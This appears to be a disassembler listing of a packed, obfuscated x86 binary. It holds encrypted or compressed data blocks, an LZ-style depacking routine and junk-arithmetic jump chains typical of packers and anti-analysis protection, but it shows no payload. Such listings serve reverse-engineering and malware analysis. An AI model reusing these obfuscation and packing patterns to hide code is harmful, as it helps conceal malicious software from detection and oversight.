dd 0F5D03964h, 36556978h, 0D75D98A5h, 62A7E258h, 24E30182h
dd 8A3A692Fh, 6AB01354h, 6CA6B341h, 0E8BB4EB9h, 5EA8368Bh
dd 24F697FBh, 652576C0h, 7AED2AACh, 0D93745E4h, 32413814h
dd 891DFBEh, 30734C57h, 0DAF2D82Ah, 1AE876Ah, 2156525Bh
dd 0A9128A71h, 2332D3D3h, 67D4A85Ah, 0E17AE2B1h, 1A0F89DBh
dd 35F6C7E7h, 9D549F5h, 87AA34B3h, 0F5DE77F2h, 0EBDC4199h
dd 3313237Ch, 2BB11E44h, 0CEE30598h, 20CC34D3h, 0ED02AA9Dh
dd 0E5AB3549h, 9570C32Dh, 46763B45h, 0FC678CFh, 0E1A76EC1h
dd 0ADB755F8h, 42AA88F7h, 0FB5BCE17h, 95CA0996h, 3C9C683Fh
dd 3AF15C70h, 0FB4DCC6Eh, 6D12B17Dh, 5F171698h, 0C2D630h
dd 5270CB8Bh, 81EEF453h, 71E7BF7Eh, 0E636B2BBh, 0A1D6D6E2h
dd 684AA73Dh, 0C58F2543h, 77178B53h, 52F51449h, 0C21806C1h
dd 0E644945Ah, 28DF09F4h, 0F6E25FF1h, 0CFD1E3D5h, 917908A9h
dd 3546FDBFh, 0CFEE28B6h, 0F2125DCCh, 6AD6A6CAh, 0F3EE93E2h
dd 5B9D8B36h, 0FB57F946h, 27BD78C2h, 134099EBh, 0E5985E26h
dd 0FA65C609h, 374A77F8h, 0D7710A46h, 0F1C0C072h, 35CC92C7h
dd 2D4931FCh, 2C918D66h, 64F7A149h, 0F83F7519h, 68A44DA1h
dd 45A493EDh, 4858D493h, 7C75C560h, 97F6003Ah, 8D274C76h
dd 0E196AD1Bh, 0BD09F6F0h, 6677772Fh, 85978B1Eh, 0BF7D4D1Ch
dd 929DF0C9h, 0E7B81DD8h, 31689E02h, 1EB0AEBAh, 0AEB0C878h
dd 0C4CF9AB8h, 5FCF795Ch, 0A52DEBE4h, 66964799h, 0C8398AFBh
dd 31F8C7A8h, 5B867392h, 0E197D7AFh, 0F56B8970h, 8F198B17h
dd 6AC7F171h, 87A77E15h, 0DA122097h, 0EA20D64Eh, 0AAAE71D7h
dd 7EAC0C4h, 55C4AF3Fh, 0DFD292C4h, 6A0CBDBCh, 0A9A136F1h
dd 4B043F1Dh, 0B5CFBBA8h, 0C065A717h, 259DA994h, 0FC236E0Fh
dd 0F23B1445h, 4A60463Bh, 0A2A4DADCh, 85BE328Eh, 2FBC5B93h
dd 4CDBE4FDh, 0FCFE775Bh, 327AFAC2h, 15A24036h, 726EA2Dh
dd 1B223DCCh, 0F685498Ah, 0B269C63Bh, 1846A245h, 0AE2D0DBAh
dd 6750274Bh, 97D7F3DEh, 0EC8D3DA5h, 81643AF3h, 8674C1F0h
dd 0AA97431Eh, 0E12A072Ah, 1F18D92Bh, 82774436h, 0A4D8BACEh
dd 976D4931h, 9B88989Bh, 0AA02BF29h, 40A53F84h, 9E076F32h
dd 0DD4EE37Dh, 9EF5A91Dh, 0BAAC75A5h, 8C59FF8Ah, 460BA606h
dd 0DB4A14F6h, 425A1E33h, 6BF57843h, 0FC01B7Bh, 4B137AC7h
dd 779BFEE0h, 0E0797425h, 0B622B4C2h, 0EFE7F658h, 2FA2DA5Fh
dd 7579DFEBh, 0D7FA3B6Ah, 506BA93Fh, 397E2024h, 2DEB1A1Ah
dd 57503959h, 1E468D9Dh, 16CFF722h, 5689994Fh, 0DFC60784h
dd 0D72DC997h, 0D3F6B57Ch, 76896234h, 2B55B167h, 0DF61C52Eh
dd 0CA6EA989h, 0F6369D70h, 0E636B6ACh, 2B680ECh, 0A9A7934Eh
dd 0E781171Eh, 0BA622383h, 0EFCB8304h, 4B43CD35h, 1D9DCBFCh
dd 63E0357Fh, 0F9B1E0F3h, 0AC20EBECh, 6A11EC19h, 0C42ACF00h
dd 0E706F056h, 8BED8E90h, 5EDC59A2h, 9A8D1F29h, 0A5F7D635h
dd 3D999338h, 0FB0081Fh, 0C99175E2h, 44974ADFh, 2343A900h
dd 9CA280A4h, 0D9885990h, 3076AAD5h, 0D12CB35Bh, 7CB576DAh
dd 5BA6F8D4h, 549E8787h, 5366AFF7h, 7CE2488Fh, 654E1539h
dd 9CC0AB4Eh, 769DD1E1h, 0FAD4C9BCh, 5E3C4D7Fh, 0CEE7EC1Bh
dd 630D2E3Bh, 886F354Ah, 36A84396h, 0F6C30995h, 1CD358DFh
dd 47F8FCFFh, 57A9376Bh, 495C8DD3h, 0E1EFF9A4h, 548F9303h
dd 8BA5FAB0h, 966CBF1Fh, 0F908A4Bh, 0E65E6D94h, 0C97CBDF5h
dd 79546368h, 0C1F1F1EAh, 37C356E1h, 0F535AF6Ch, 66945AAEh
dd 3D29EC9h, 34958AECh, 3AFF9B43h, 0CF6C9FF6h, 4D240A68h
dd 82C9D8E8h, 24B049A5h, 7527D254h, 147095A3h, 457D9445h
dd 9D516F17h, 8C6BE029h, 7CE93E4Ch, 0A385BD6Fh, 275CFB35h
dd 0A791ABBCh, 0DB3A0DD6h, 649A0466h, 39881BC6h, 0C0E00725h
dd 0BD857E9h, 1675FB55h, 0D1FBB2F2h, 0ADF7BC8h, 0EA861BA1h
dd 75585B9Ah, 1D5A6595h, 0D0566A68h, 12B2D136h, 7202D543h
dd 377F6A44h, 14DBACB3h, 0D131122Eh, 5A3F6AFBh, 73E7D1A3h
dd 43341383h, 0FF515B95h, 5FB0BE92h, 2ACF8968h, 9DE2A6EBh
dd 0BEC2C1DFh, 727CFE50h, 0B517C975h, 1AB9368Ah, 0C3F1E8EAh
dd 37CAC1F5h, 647D76h, 7DDF4FD5h, 0CDF1CE63h, 6F859184h
dd 0E0D9188Fh, 8FA70F03h, 6E2BDD2Bh, 0D908E67Dh, 70ECFD2Fh
dd 1E3E1FC6h, 769F6E9Dh
dd 99BB1B1Ah, 58EB3564h, 0EAAC3635h, 4ED5518Bh, 4A54E626h
dd 9AC95953h, 7CACA5C3h, 581542DFh, 0E765E926h, 76C9E352h
dd 9ED20456h, 0B17C1F69h, 2ECE2ECFh, 9EFBB3FFh, 5BF4E0E0h
dd 0A5936615h, 0F917A995h, 8BEBDCFEh, 2D3C4DC4h, 0DC157027h
dd 0F9CB6B7Dh, 5B46652Bh, 9FADD58h, 0E111456Eh, 83118B2Ch
dd 62AAB6D4h, 78B7C549h, 152C5A0Eh, 0A7DB563h, 0AB385FDFh
dd 0F6D39363h, 0CBB66324h, 52C7E552h, 7D142CF5h, 0C43B04E2h
dd 5D61690Dh, 0CE49BBFFh, 7995352Fh, 0B43C48C4h, 6980893Ah
dd 0F22AF31Ch, 0FB562A4h, 0AF9DE985h, 66C3941h, 212BBE0Ah
dd 58E10A1Fh, 24EEFA97h, 9BBA605Ah, 5DC6F41Ch, 6DF17E25h
dd 0CA0080F7h, 0F194067Eh, 0B5560525h, 874CAC19h, 366C8613h
dd 2BC8FEBh, 1EA954A6h, 6ED7AD82h, 830ECFFAh, 0ECC7EDBEh
dd 0D89D66B3h, 0C623B859h, 0F6FDBE78h, 0BA14082Eh, 0B3E22EEAh
dd 4B44B534h, 0ADC64090h, 29113F01h, 817D3B80h, 0B60E3701h
dd 8CBA692Bh, 8C437EF7h, 0F4A1A2E6h, 7C3AF352h, 0CEBBB81Eh
dd 6ADD83D2h, 0DAB56986h, 8D98C90Ch, 0C873B61Fh, 0A8D5E1BFh
dd 0EC8AE38Eh, 43F4461Eh, 58A7EDC1h, 4B03CAC2h, 77A36FAEh
dd 0EB8FC1DDh, 30CA178Ch, 42D1AB6Dh, 5EB756A5h, 0FA4FCCFFh
dd 31F77585h, 25BC4EFDh, 4814CD59h, 0ED9F09A4h, 68B05E49h
dd 0B2E532BBh, 0D77C46A8h, 0C5FDEE50h, 55B3FE8Fh, 0CF72CDEFh
dd 58D8968Ah, 1E2F5D8Ah, 9A713933h, 0D53E9CBFh, 0BE9C10BFh
dd 0E367FC67h, 23EBF2CEh, 4B4D58B5h, 745DC734h, 0FF1A75B4h
dd 0B9796EEEh, 81AEB7BEh, 6374F84Ah, 0B89F6C98h, 0AA658AB5h
dd 793B4E30h, 1BAC7C9Dh, 0C093A238h, 0DA3ED03Bh, 9E44F1F1h
dd 1EDDBFEEh, 50927939h, 0F83E5CEDh, 7B1D379Ch, 0A5B8836h
dd 0BAC57FBFh, 933B3787h, 0B7F379DCh, 0A4D0C9D3h, 15B6F25Eh
dd 940EB052h, 0DF17138Fh, 0FDB60DDCh, 0D922E159h, 9888E5C8h
dd 2D6D2C89h, 0B03E834Fh, 4AED8C55h, 0C599EE11h, 0AA919FEFh
dd 0FCF01F8Eh, 0A117FD44h, 9FAAD56Dh, 0BADF619Ah, 1B8C6EE9h
dd 5CA25A33h, 0B26D3705h, 3513AE47h, 87E15057h, 36EEE5D9h
dd 0E8CC2FF6h, 66BE93ADh, 93479DC5h, 1F578AD7h, 25D1AB78h
dd 94AE2249h, 0B88A33F0h, 0AC90F85h, 0C04AF516h, 60A7B3EEh
dd 200159CEh, 5849025h, 89B47E66h, 0A2D0F1F6h, 0E24B5B21h
dd 8BB6BF56h, 3A309C5Dh, 0A6F6690Dh, 7D5E6AC3h, 350F4473h
dd 0E36A0F0Ah, 0D7EFC1D5h, 99A031A7h, 0EF8E0BF4h, 42A0FA33h
dd 40DB9514h, 6195AAE2h, 89950C03h, 41ACE85h, 34A962D9h
dd 0C83C7338h, 35B08581h, 0DDD6A9DAh, 353D1FC6h, 71FB1F8Bh
dd 0F8C8F9D7h, 56A6F9A7h, 52487E3Fh, 0FC7EFE3Fh, 0BBE77FCBh
dd 4DFCEDDCh, 81779141h, 0FF27795h, 30D13757h, 8978246Eh
dd 6564B12Fh, 0CEECB00Eh, 0F1D6EBFBh, 0C8A8A1B2h, 0A1B1A90Eh
dd 90340485h, 3D03284Ah, 0D864BBDDh, 0D495EF32h, 3D3BBA68h
dd 0F6B74A9Ah, 5C105FEFh, 0DAE5A1Dh, 0B3179155h, 4BA5BACEh
dd 77256FD4h, 6EEAED98h, 0EBD6B91Ch, 7FB9h, 1E64C000h
dd 2
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4878C2 proc near ; DATA XREF: znnrn47v:0048D299o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00487A41 SIZE 00000004 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cld
push ebx
push edi
push esi
mov [ebp+var_4], eax
mov [ebp+var_8], edx
mov esi, eax
mov edi, edx
cmp word ptr [esi], 434Ah
jnz loc_487A04
add esi, 0Ah
mov [ebp+var_C], 8
xor ebx, ebx
mov edx, 80000000h
inc ebx
loc_4878F3: ; CODE XREF: sub_4878C2+46j
; sub_4878C2+8Dj ...
xor eax, eax
call sub_487A0B
jnb short loc_48790A
mov ecx, [ebp+var_10]
call sub_487A23
add al, [ebp+var_11]
loc_487907: ; CODE XREF: sub_4878C2+65j
stosb
jmp short loc_4878F3
; ---------------------------------------------------------------------------
loc_48790A: ; CODE XREF: sub_4878C2+38j
call sub_487A0B
jb loc_4879AC
call sub_487A0B
jnb short loc_487977
mov ecx, 4
call sub_487A23
dec eax
jz short loc_487907
jns loc_4879F6
call sub_487A0B
jnb short loc_487951
push ebp
loc_487937: ; CODE XREF: sub_4878C2+8Aj
mov ebp, 100h
loc_48793C: ; CODE XREF: sub_4878C2+83j
call sub_487A18
mov [edi], al
inc edi
dec ebp
jnz short loc_48793C
call sub_487A0B
jb short loc_487937
pop ebp
jmp short loc_4878F3
; ---------------------------------------------------------------------------
loc_487951: ; CODE XREF: sub_4878C2+72j
mov ecx, 1
call sub_487A23
add eax, 7
mov [ebp+var_10], eax
mov [ebp+var_11], 0
cmp eax, 8
jz short loc_4878F3
call sub_487A18
mov [ebp+var_11], al
jmp loc_4878F3
; ---------------------------------------------------------------------------
loc_487977: ; CODE XREF: sub_4878C2+58j
mov ecx, 7
call sub_487A23
push eax
mov ecx, 2
call sub_487A23
mov ecx, eax
inc ecx
inc ecx
pop eax
or eax, eax
jz short loc_487999
mov ebx, eax
jmp short loc_4879F7
; ---------------------------------------------------------------------------
loc_487999: ; CODE XREF: sub_4878C2+D1j
cmp ecx, 2
jz short loc_487A04
inc ecx
call sub_487A23
mov [ebp+var_C], eax
jmp loc_4878F3
; ---------------------------------------------------------------------------
loc_4879AC: ; CODE XREF: sub_4878C2+4Dj
call sub_487A2F
dec ecx
loop loc_4879BD
mov eax, ebx
call sub_487A2F
jmp short loc_4879F7
; ---------------------------------------------------------------------------
loc_4879BD: ; CODE XREF: sub_4878C2+F0j
dec ecx
mov eax, ecx
push ebp
mov ecx, [ebp+var_C]
mov ebp, eax
xor eax, eax
shl ebp, cl
call sub_487A23
or eax, ebp
pop ebp
mov ebx, eax
call sub_487A2F
cmp eax, 10000h
jnb short loc_4879F4
cmp eax, 37FFh
jnb short loc_4879F5
cmp eax, 27Fh
jnb short loc_4879F6
cmp eax, 7Fh
ja short loc_4879F7
inc ecx
loc_4879F4: ; CODE XREF: sub_4878C2+11Cj
inc ecx
loc_4879F5: ; CODE XREF: sub_4878C2+123j
inc ecx
loc_4879F6: ; CODE XREF: sub_4878C2+67j
; sub_4878C2+12Aj
inc ecx
loc_4879F7: ; CODE XREF: sub_4878C2+D5j
; sub_4878C2+F9j ...
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_4878F3
; ---------------------------------------------------------------------------
loc_487A04: ; CODE XREF: sub_4878C2+19j
; sub_4878C2+DAj
mov eax, esi
pop esi
pop edi
pop ebx
jmp short loc_487A41
sub_4878C2 endp
; =============== S U B R O U T I N E =======================================
sub_487A0B proc near ; CODE XREF: sub_4878C2+33p
; sub_4878C2:loc_48790Ap ...
add edx, edx
jnz short locret_487A17
mov edx, [esi]
add esi, 4
stc
adc edx, edx
locret_487A17: ; CODE XREF: sub_487A0B+2j
retn
sub_487A0B endp
; =============== S U B R O U T I N E =======================================
sub_487A18 proc near ; CODE XREF: sub_4878C2:loc_48793Cp
; sub_4878C2+A8p
mov ecx, 8
call sub_487A23
retn
sub_487A18 endp
; =============== S U B R O U T I N E =======================================
sub_487A23 proc near ; CODE XREF: sub_4878C2+3Dp
; sub_4878C2+5Fp ...
xor eax, eax
loc_487A25: ; CODE XREF: sub_487A23+9j
call sub_487A0B
adc eax, eax
loop loc_487A25
retn
sub_487A23 endp
; =============== S U B R O U T I N E =======================================
sub_487A2F proc near ; CODE XREF: sub_4878C2:loc_4879ACp
; sub_4878C2+F4p ...
xor ecx, ecx
inc ecx
loc_487A32: ; CODE XREF: sub_487A2F+Fj
call sub_487A0B
adc ecx, ecx
call sub_487A0B
jb short loc_487A32
retn
sub_487A2F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4878C2
loc_487A41: ; CODE XREF: sub_4878C2+147j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4878C2
; ---------------------------------------------------------------------------
align 2
word_487A46 dw 89E8h ; DATA XREF: sub_48D259o
; znnrn47v:0048D288o
dd 34h, 491BE9h, 64000000h, 30058Bh, 8B530000h, 241C87DEh
; CODE XREF: znnrn47v:0048C4CCj
dd 0EDDA7968h, 0E9505EF4h, 5662h, 860F0000h, 219Dh, 50BBF681h
dd 86E957BDh, 0E800002Ah, 3F5h, 9EE90000h, 0E900000Fh
dd 163Eh, 1C2DE900h, 87000000h, 575A2414h, 419E8h, 43B1E900h
dd 0
; ---------------------------------------------------------------------------
loc_487AA8: ; CODE XREF: znnrn47v:00487D78j
jmp loc_48C4C0
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
cmp al, 24h
pop edi
push eax
mov eax, offset loc_489F9C
jmp loc_4890CF
; ---------------------------------------------------------------------------
sbb eax, 7546FCE4h
jmp sub_48B39C
; ---------------------------------------------------------------------------
align 2
dw 0F5E8h
dd 0Ch, 2E8A0F00h, 0E900002Eh, 4589h, 68C30000h, 0AE8F6258h
dd 71F08158h, 8191B848h, 1CD617E0h, 45F2E9D9h, 81000000h
dd 6B7E68D6h, 148F0FDDh, 0E900001Ch, 8BAh, 0C30000h, 97E7BF57h
dd 39E90048h, 47h, 0C0016368h, 0E08158D2h, 64EFDA35h, 0DA12C081h
dd 0FFE9E5C9h, 25h, 378D0F00h, 3Eh, 3D30B00h, 0E4CD81F0h
dd 0E9469094h, 3E26h, 0C78B0000h, 8B242C87h, 0E8815DFDh
dd 7F2D770Ah, 0CCE9F081h, 0C6E92931h, 2Ch, 68C51300h, 48B0A5h
dd 48FDE9h, 0C3000000h, 3C82E900h, 26E90000h, 8700000Dh
dd 6459240Ch, 30058Bh, 68560000h, 935505DEh, 4A26E95Eh
dd 0C6000000h, 685BC303h, 0C1DCE288h, 8B240487h, 0EE8158F0h
dd 8E9C5230h, 32EAE9h, 76800F00h, 68000009h, 48AABAh, 12CEE9h
dd 0C3000000h, 48C18100h, 68937CC7h, 489D38h, 0F14E9h
dd 3AE88100h, 0C195CCB7h, 0E08114C0h, 284FC345h, 0BC93C081h
dd 83E98D64h, 68000030h, 48C697h, 2DF8E9h, 81000000h, 0BD4EA4CAh
dd 83C281F6h, 68AFD7E6h, 48A476h, 5069E9h, 4D4D6800h, 8B51E254h
dd 240C87CBh, 488CFCBBh, 2941E900h, 10870000h, 87241487h
dd 0D68B2434h, 4492E95Eh, 68000000h, 2EC3A05Ah, 75F3815Bh
dd 81400358h, 738F06E3h, 50EB817Eh, 0FD320DAh, 0B0C85h
dd 0B8E90000h, 2Eh, 0E9FD8700h, 4200h, 61E80000h, 10h
dd 0E9CA1300h, 0F8Ch, 53850F00h, 87000054h, 1C872434h
dd 5BF38B24h, 0E9240C87h, 0ECFh, 0F2810000h, 0FB5B1821h
dd 963BEA81h, 0B8E87F28h, 0
dd 2FAEE900h, 0C6000000h, 685F9D07h, 48BBC2h, 3F0AE9h
; CODE XREF: sub_48A96C:loc_4886E0j
dd 33000000h, 3C1DE9C1h, 0C6000000h, 0E85E8706h, 3C4h
dd 49EAE900h, 0E9000000h, 1728h, 0C30000C3h, 99E90000h
dd 11h, 8B241C87h, 240C87CBh, 5152E9h, 34870000h, 7F516824h
dd 0BDE90048h, 51h, 5E8B06C6h, 3795E8h, 81000000h, 5D35C6C8h
dd 3FC081E2h, 3CA0BCEh, 0DEE958C8h, 0Fh, 0AD5E681h, 0C68173A2h
dd 8D4879D7h, 2B3EE9h, 0DABBF00h, 0EE81977Dh, 0D3A276C4h
dd 30C8E9h, 13000000h, 2BDAE9C8h, 0E9130000h, 87241487h
dd 0D18B240Ch, 460E9h, 87000000h, 81582404h, 0C7406DC2h
dd 14AE9D9Fh, 5131E924h, 0
; ---------------------------------------------------------------------------
mov ebp, [edx]
; =============== S U B R O U T I N E =======================================
sub_487D6E proc near
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0048A131 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048A7E7 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
jmp loc_48A131
sub_487D6E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
jmp loc_487AA8
; ---------------------------------------------------------------------------
db 0E8h, 0Eh, 2
dd 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_487D84: ; CODE XREF: sub_48A8E8+1Dj
jmp loc_48BE87
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
align 2
jmp loc_48B95E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_580. PRESS KEYPAD "+" TO EXPAND]
dd 0C6810000h, 6B196506h, 92FF6850h, 81584CCBh, 17873EE0h
; CODE XREF: znnrn47v:loc_48B98Ej
dd 34C8E93Eh, 880F0000h, 4603h, 4EF1810Fh, 7B680000h, 0E90048CAh
dd 18C0h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_487DC2 proc near ; CODE XREF: znnrn47v:0048B701j
; sub_48AE05:loc_48C9DFp
; FUNCTION CHUNK AT 00488F22 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A864 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C468 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
pop ebp
jmp loc_48C468
sub_487DC2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0E9560000h, 0A0Dh, 8383BA52h, 0C7E90048h, 13h, 0D18E6800h
dd 815AC337h, 0DDB8E4F2h, 42E28115h, 0C190D5EDh, 0C8E91BC2h
dd 4Ch, 0E9C63B00h, 42A8h, 4870000h, 0C3535824h, 239A1568h
dd 2779E927h, 3C870000h, 242C8724h, 0F5DFD8Bh, 2F6A85h
dd 9108B00h, 9F840FD2h, 0E9FFFFFFh, 1A26h, 8E8C0F00h, 13000004h
dd 5BD50BDDh, 0B773F981h, 78E9E05Ah, 4, 47820FC3h, 6800002Fh
dd 48A7A8h, 1B0EE9h, 18EBC100h, 87241C87h, 0DA8B2414h
dd 58F645Ah, 0
; ---------------------------------------------------------------------------
jmp loc_48A154
; ---------------------------------------------------------------------------
db 2 dup(0), 8Bh
; ---------------------------------------------------------------------------
std
xchg edx, [esp]
pop edx
xchg edx, [esp]
pop edx
mov byte ptr [ecx], 64h
pop ecx
push large dword ptr fs:0
jmp loc_4882BC
; ---------------------------------------------------------------------------
db 2 dup(0), 81h ; CODE XREF: sub_4883C2+17j
dd 731FD1E9h, 0DD850F64h, 1Dh, 1E46E900h, 87000000h, 1A8B0FE8h
dd 6800003Bh, 0DA3542Ch, 2A4E9h, 34870000h, 240C8724h
dd 6859F18Bh, 0E4CA85F8h, 7DE9h, 0C3000000h, 9AE90000h
dd 14h, 5E243487h, 1AC66851h, 81595A40h, 84D753E1h, 20C18117h
dd 0E9EE486Bh, 0FFFFFDADh, 242C8700h, 2F466853h, 815B73F8h
dd 6F4139E3h, 4426E94Bh, 0
; ---------------------------------------------------------------------------
shr edx, 19h
jmp sub_48997A
; ---------------------------------------------------------------------------
dd 0D8810000h, 0B048A58h, 2311E9h, 3B560000h, 0A57E9CEh
dd 0BB530000h, 48A533h, 1AA7E9h, 8C0F0000h, 16BEh, 0FFFF97E9h
dd 0E900C3FFh, 2D22h, 66E90000h, 2Ch, 244C8B00h, 13FEE810h
dd 0C30000h, 4593E9h, 0E9000000h, 333Eh, 0E9241C87h, 27AAh
dd 0C0286800h, 7EE90048h, 0F000050h, 316188h, 0FDC0E900h
dd 0C300FFFFh, 2621E900h, 0
dd 59240C87h, 9C82BE56h, 0A7E90048h, 0FFFFFAh
db 0
; =============== S U B R O U T I N E =======================================
sub_487FA1 proc near ; CODE XREF: znnrn47v:004888FFj
; znnrn47v:0048BC3Fp
; FUNCTION CHUNK AT 00489D52 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048B252 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048BA89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BAAE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C3F9 SIZE 00000018 BYTES
xchg edi, [esp+0]
pop edi
push 5644DCBEh
pop esi
or esi, 0B51670A1h
jmp loc_48C3F9
sub_487FA1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
adc ebp, 33AD686Dh
xor edi, ecx
jmp loc_48906D
; ---------------------------------------------------------------------------
loc_487FC5: ; CODE XREF: znnrn47v:loc_48BDEBj
pop eax
xor eax, 48D2752Bh
sub eax, 0FB249242h
xor eax, 9DC64436h
push offset loc_489506
jmp locret_488BA7
; ---------------------------------------------------------------------------
xor ebx, 43680104h
call sub_488F90
jmp loc_489C99
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_601. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_487FF5: ; CODE XREF: znnrn47v:0048ADAEj
jmp loc_48C6F2
; ---------------------------------------------------------------------------
align 4
dd 0FFFBC2E9h, 58E900FFh, 0F700003Bh, 16AE1DC1h, 8E6E9B8h
; CODE XREF: znnrn47v:0048951Cj
dd 850F0000h, 17D2h, 24148759h, 0C87F28Bh, 59D18B24h, 0FFFAB6E9h
dd 0C30000FFh, 17BE900h, 0E2E90000h, 4Eh, 51C28C0Fh, 76E90000h
dd 3Ah, 0C300h, 0A9B9515Eh, 0E90048C7h, 2543h, 0C8EE6800h
dd 8158C8EAh, 0B626D3C0h, 55C88137h, 8110E601h, 61B820C0h
dd 3C61E9EFh, 0C15F0000h, 0FA680BC7h, 0E90048ADh, 80Fh
dd 48CF2EB8h, 0EF2E900h, 0
; ---------------------------------------------------------------------------
xchg ecx, [esp]
pop ecx
push ecx
mov ecx, eax
xchg ecx, [esp]
push 487B18h
jmp locret_48A595
; =============== S U B R O U T I N E =======================================
sub_4880A0 proc near ; CODE XREF: sub_48C70B+14j
; znnrn47v:0048CF13p
xchg eax, [esp+0]
xchg ebp, [esp+0]
mov eax, ebp
pop ebp
push edx
push offset sub_488B8D
jmp nullsub_592
sub_4880A0 endp
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B677
loc_4880B6: ; CODE XREF: sub_48B677:loc_48884Aj
push offset loc_488263
jmp nullsub_576
; END OF FUNCTION CHUNK FOR sub_48B677
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_4880C1: ; CODE XREF: sub_488955+39B5j
push 6167639Ah
or ebx, edx
loc_4880C8: ; CODE XREF: sub_488955:loc_48C2FFj
rol eax, 0Dh
sub eax, 95C19853h
and eax, 0C1F2A268h
cmp eax, 0F25C1052h
jmp loc_48AD3F
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
loc_4880E2: ; CODE XREF: znnrn47v:0048C459j
pop edx
or edx, 0A4C113B9h
xor edx, 0F2AB1292h
add edx, 0F0935E99h
xchg eax, edi
retn 0F5Ah
; ---------------------------------------------------------------------------
db 84h, 10h, 30h
dd 0F9E90000h, 4Bh, 4EE36857h, 815F62F2h, 44611AC7h, 15BBE968h
dd 0CB810000h, 0AD980F2Dh, 1C51E8h, 87000000h, 8159240Ch
dd 356E86C6h, 95E96852h, 31E90048h, 33h, 7E9D5F7h, 3Bh
dd 0C0840F00h, 0FFFFFBh, 0C2C19C00h, 17E2C11Ch, 81E5C281h
dd 0ACE91762h, 0FFFFFBh, 19E95300h, 0C600001Bh, 815E8506h
dd 150362EAh, 34C28147h, 68811032h, 48AE86h, 2E40E9h, 0C6810000h
dd 82C9D892h, 8D19FA81h, 56E90342h, 8, 6FE38100h, 0E9D229E8h
dd 2FD9h, 0E8128B00h, 0BE1h, 0CCE90000h, 26h, 0C300h, 3111E9h
dd 43A7E900h, 0
dd 20B38A0Fh, 0A9E90000h, 14h, 2D1AE8h, 128B0000h, 48B34B68h
dd 12FDE900h, 0EF1B0000h, 1FFCE9h, 0F0810000h, 787B1FFCh
dd 0C081C503h, 704ECCB4h, 8A9D008Bh
db 0
byte_4881F5 db 2Ch, 99h, 0E9h ; DATA XREF: sub_48BD79-CB9o
dd 0FFFFFBE5h, 24148700h, 50C2895Ah, 487C28Bh, 4615E924h
dd 0
; ---------------------------------------------------------------------------
locret_488210: ; CODE XREF: znnrn47v:loc_48B11Cj
retn
; ---------------------------------------------------------------------------
align 2
loc_488212: ; DATA XREF: znnrn47v:loc_488298o
add eax, 5EE0D5E2h
add eax, ebp
add eax, 61A16E85h
mov eax, [eax]
jmp loc_48944C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48BD79
loc_488228: ; CODE XREF: sub_48BD79:loc_48954Aj
call sub_48C82C
; END OF FUNCTION CHUNK FOR sub_48BD79
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 3920h, 0B951C300h, 4883A3h, 3754E9h, 8B000000h, 14879D12h
dd 9BE85724h, 41h, 2EB8E900h, 0
; ---------------------------------------------------------------------------
xchg edx, [esp]
mov ecx, edx
pop edx
call sub_48930E
loc_488263: ; DATA XREF: sub_48B677:loc_4880B6o
pushf
push offset loc_488822
jmp loc_48BFF6
; ---------------------------------------------------------------------------
align 10h
loc_488270: ; CODE XREF: znnrn47v:0048CAF8j
xchg esi, [esp]
mov eax, esi
pop esi
sub eax, 0EC3AE032h
push offset loc_488589
jmp locret_48CDD4
; ---------------------------------------------------------------------------
loc_488286: ; CODE XREF: znnrn47v:0048A4CEj
jnb loc_48A9D4
loc_48828C: ; CODE XREF: znnrn47v:00488DDBj
; znnrn47v:loc_48A4B9j
push esi
mov esi, offset loc_48AE8C
jmp loc_488DC8
; ---------------------------------------------------------------------------
align 4
loc_488298: ; CODE XREF: znnrn47v:0048BDF0j
push offset loc_488212
jmp loc_48B11C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_4882A2: ; CODE XREF: sub_48D039:loc_488344j
add esi, 7BF28268h
loc_4882A8: ; CODE XREF: znnrn47v:0048AE6Ej
xchg esi, [esp+0]
jmp loc_48A528
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
dd 99F2058Dh, 0EBE80048h, 34h
; ---------------------------------------------------------------------------
loc_4882BC: ; CODE XREF: znnrn47v:00487E8Cj
jmp loc_48B232
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 2F5689h, 8FC08100h, 0E875C607h, 0FFFFFB32h, 248BE900h
dd 0
dword_4882DC dd 48987F68h, 0FBBBE900h, 0FFFFh, 5B241C87h, 0FFE3C081h
